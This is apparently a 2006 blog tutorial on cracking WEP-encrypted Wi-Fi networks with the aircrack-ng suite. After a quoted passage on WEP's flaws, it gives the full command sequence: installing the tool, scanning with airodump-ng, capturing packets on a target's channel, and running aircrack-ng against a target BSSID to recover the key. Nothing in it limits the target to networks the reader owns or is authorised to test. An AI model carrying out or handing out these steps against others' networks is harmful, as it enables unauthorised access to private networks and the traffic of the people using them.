Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)

Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)

September 27, 2006 at 20:22 · Tags: Crack, d-link, hack, linksys, Linux, OSX, security, Vista, WEP, Windows, wireless networking, xp

Aircrack-ng logo

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia

It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.

Install aircrack-ng - on Debian Etch by:

sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.